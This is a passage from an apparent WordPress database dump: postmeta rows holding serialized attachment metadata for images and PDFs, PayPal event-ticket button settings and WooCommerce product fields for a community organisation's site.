:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"image1-2-300x80.png\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"image1-2-768x204.png\";s:5:\"width\";i:768;s:6:\"height\";i:204;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"image1-2-1024x273.png\";s:5:\"width\";i:1024;s:6:\"height\";i:273;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"image1-2-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"image1-2-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"image1-2-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"image1-2-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4400,1164,'_wp_attached_file','2016/11/BOGThumbnail.png'),(4401,1164,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:24:\"2016/11/BOGThumbnail.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"BOGThumbnail-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:24:\"BOGThumbnail-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4404,1166,'_wp_attached_file','2017/09/adoptaroad.jpg'),(4405,1166,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:799;s:6:\"height\";i:618;s:4:\"file\";s:22:\"2017/09/adoptaroad.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"adoptaroad-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"adoptaroad-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"adoptaroad-768x594.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:594;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"adoptaroad-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:22:\"adoptaroad-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:22:\"adoptaroad-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"adoptaroad-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4406,1167,'_wp_attached_file','2017/09/Adoptahighway.png'),(4407,1167,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:25:\"2017/09/Adoptahighway.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Adoptahighway-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"Adoptahighway-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5333,1354,'_wp_attached_file','2020/01/IMG_0732.jpg'),(5334,1354,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:272;s:4:\"file\";s:20:\"2020/01/IMG_0732.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0732-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0732-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0732-400x272.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"IMG_0732-450x272.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0732-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D810\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573872317\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:4:\"1250\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5335,1355,'_wp_attached_file','2020/01/IMG_0728.jpg'),(5336,1355,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1640;s:6:\"height\";i:922;s:4:\"file\";s:20:\"2020/01/IMG_0728.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0728-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0728-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0728-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0728-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0728-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"IMG_0728-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"IMG_0728-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0728-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1579378519\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(4428,1173,'_wp_attached_file','2017/01/LGZScholarshipReleaseForm.pdf'),(4429,1173,'_wp_attachment_metadata','a:1:{s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"LGZScholarshipReleaseForm-pdf-116x150.jpg\";s:5:\"width\";i:116;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"LGZScholarshipReleaseForm-pdf-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:42:\"LGZScholarshipReleaseForm-pdf-791x1024.jpg\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"full\";a:4:{s:4:\"file\";s:33:\"LGZScholarshipReleaseForm-pdf.jpg\";s:5:\"width\";i:1088;s:6:\"height\";i:1408;s:9:\"mime-type\";s:10:\"image/jpeg\";}}}'),(4457,1184,'_wp_attached_file','2017/09/IMG_9335.jpg'),(4458,1184,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:5184;s:6:\"height\";i:3456;s:4:\"file\";s:20:\"2017/09/IMG_9335.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_9335-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_9335-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_9335-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_9335-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_9335-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"IMG_9335-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"IMG_9335-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"IMG_9335-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:19:\"Canon EOS REBEL T3i\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1505570980\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(4461,1186,'_wp_attached_file','2017/10/Morebirthdays.png'),(4462,1186,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:25:\"2017/10/Morebirthdays.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Morebirthdays-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"Morebirthdays-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4493,1196,'_wp_attached_file','2017/10/hcpss-logo-outlined.png'),(4494,1196,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:206;s:6:\"height\";i:206;s:4:\"file\";s:31:\"2017/10/hcpss-logo-outlined.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"hcpss-logo-outlined-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:31:\"hcpss-logo-outlined-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4517,1203,'_wp_attached_file','2017/10/Spirit-Night-2.pdf'),(4518,1203,'_wp_attachment_metadata','a:1:{s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Spirit-Night-2-pdf-116x150.jpg\";s:5:\"width\";i:116;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Spirit-Night-2-pdf-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Spirit-Night-2-pdf-791x1024.jpg\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"full\";a:4:{s:4:\"file\";s:22:\"Spirit-Night-2-pdf.jpg\";s:5:\"width\";i:1088;s:6:\"height\";i:1408;s:9:\"mime-type\";s:10:\"image/jpeg\";}}}'),(4519,1204,'_wp_attached_file','2017/10/Spirit-Night.png'),(4520,1204,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:816;s:6:\"height\";i:1056;s:4:\"file\";s:24:\"2017/10/Spirit-Night.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Spirit-Night-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Spirit-Night-232x300.png\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Spirit-Night-768x994.png\";s:5:\"width\";i:768;s:6:\"height\";i:994;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Spirit-Night-791x1024.png\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"Spirit-Night-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:24:\"Spirit-Night-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:24:\"Spirit-Night-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:24:\"Spirit-Night-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4521,1205,'_wp_attached_file','2017/10/YouthSpiritNight.png'),(4522,1205,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:28:\"2017/10/YouthSpiritNight.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"YouthSpiritNight-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:28:\"YouthSpiritNight-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4548,1209,'wpeevent_button_header','1'),(4547,1209,'wpeevent_button_show','1'),(4549,1209,'wpeevent_button_border','0'),(4550,1209,'wpeevent_button_currency','25'),(4551,1209,'wpeevent_button_language','3'),(4552,1209,'wpeevent_button_buttonsize','0'),(4553,1209,'wpeevent_button_pp_text','Your eTicket will be emailed after payment to your PayPal email address.'),(4554,1209,'wpeevent_button_sold_out','Sold Out'),(4555,1209,'wpeevent_button_name_a','General Admission'),(4556,1209,'wpeevent_button_name_b',''),(4557,1209,'wpeevent_button_name_c',''),(4558,1209,'wpeevent_button_h_title','Quantity:'),(4559,1209,'wpeevent_button_h_name','Name:'),(4560,1209,'wpeevent_button_h_price','Price:'),(4561,1209,'wpeevent_button_h_desc','Description:'),(4562,1209,'wpeevent_button_price_a','46.65'),(4563,1209,'wpeevent_button_price_b',NULL),(4564,1209,'wpeevent_button_price_c',NULL),(4565,1209,'wpeevent_button_id_a',''),(4566,1209,'wpeevent_button_id_b',''),(4567,1209,'wpeevent_button_id_c',''),(4568,1209,'wpeevent_button_qty_a','200'),(4569,1209,'wpeevent_button_qty_b',''),(4570,1209,'wpeevent_button_qty_c',''),(4571,1209,'wpeevent_button_desc_a',''),(4572,1209,'wpeevent_button_desc_b',''),(4573,1209,'wpeevent_button_desc_c',''),(5057,1285,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:960;s:4:\"file\";s:61:\"2018/08/26815367_1555517271150280_7321703591062839456_n-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"26815367_1555517271150280_7321703591062839456_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:61:\"26815367_1555517271150280_7321703591062839456_n-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"26815367_1555517271150280_7321703591062839456_n-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:61:\"26815367_1555517271150280_7321703591062839456_n-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:61:\"26815367_1555517271150280_7321703591062839456_n-1-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:61:\"26815367_1555517271150280_7321703591062839456_n-1-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:61:\"26815367_1555517271150280_7321703591062839456_n-1-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5056,1285,'_wp_attached_file','2018/08/26815367_1555517271150280_7321703591062839456_n-1.jpg'),(5055,1284,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:960;s:4:\"file\";s:59:\"2018/08/26815367_1555517271150280_7321703591062839456_n.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"26815367_1555517271150280_7321703591062839456_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"26815367_1555517271150280_7321703591062839456_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"26815367_1555517271150280_7321703591062839456_n-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:59:\"26815367_1555517271150280_7321703591062839456_n-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:59:\"26815367_1555517271150280_7321703591062839456_n-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:59:\"26815367_1555517271150280_7321703591062839456_n-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:59:\"26815367_1555517271150280_7321703591062839456_n-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5054,1284,'_wp_attached_file','2018/08/26815367_1555517271150280_7321703591062839456_n.jpg'),(4596,1214,'_wc_review_count','0'),(4597,1214,'_wc_rating_count','a:0:{}'),(4598,1214,'_wc_average_rating','0'),(4599,1214,'_edit_lock','1509148152:1'),(4600,1214,'_edit_last','1'),(4601,1214,'_sku',''),(4602,1214,'_regular_price',''),(4603,1214,'_sale_price',''),(4604,1214,'_sale_price_dates_from',''),(4605,1214,'_sale_price_dates_to',''),(4606,1214,'total_sales','0'),(4607,1214,'_tax_status','taxable'),(4608,1214,'_tax_class',''),(4609,1214,'_manage_stock','no'),(4610,1214,'_backorders','no'),(4611,1214,'_sold_individually','no'),(4612,1214,'_weight',''),(4613,1214,'_length',''),(4614,1214,'_width',''),(4615,1214,'_height',''),(4616,1214,'_upsell_ids','a:0:{}'),(4617,1214,'_crosssell_ids','a:0:{}'),(4618,1214,'_purchase_note',''),(4619,1214,'_default_attributes','a:0:{}'),(4620,1214,'_virtual','no'),(4621,1214,'_downloadable','no'),(4622,1214,'_product_image_gallery',''),(4623,1214,'_download_limit','-1'),(4624,1214,'_download_expiry','-1'),(4625,1214,'_stock',NULL),(4626,1214,'_stock_status','instock'),(4627,1214,'_product_version','3.2.1'),(4628,1214,'_price',''),(4629,531,'_wc_review_count','0'),(4630,531,'_wc_rating_count','a:0:{}'),(4631,531,'_wc_average_rating','0'),(4632,531,'ts_article_views','57'),(4633,1215,'_wp_attached_file','2014/12/LGZ-Pic.png'),(4634,1215,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:600;s:4:\"file\";s:19:\"2014/12/LGZ-Pic.png\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"LGZ-Pic-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"LGZ-Pic-200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"LGZ-Pic-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:19:\"LGZ-Pic-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:19:\"LGZ-Pic-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:19:\"LGZ-Pic-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\"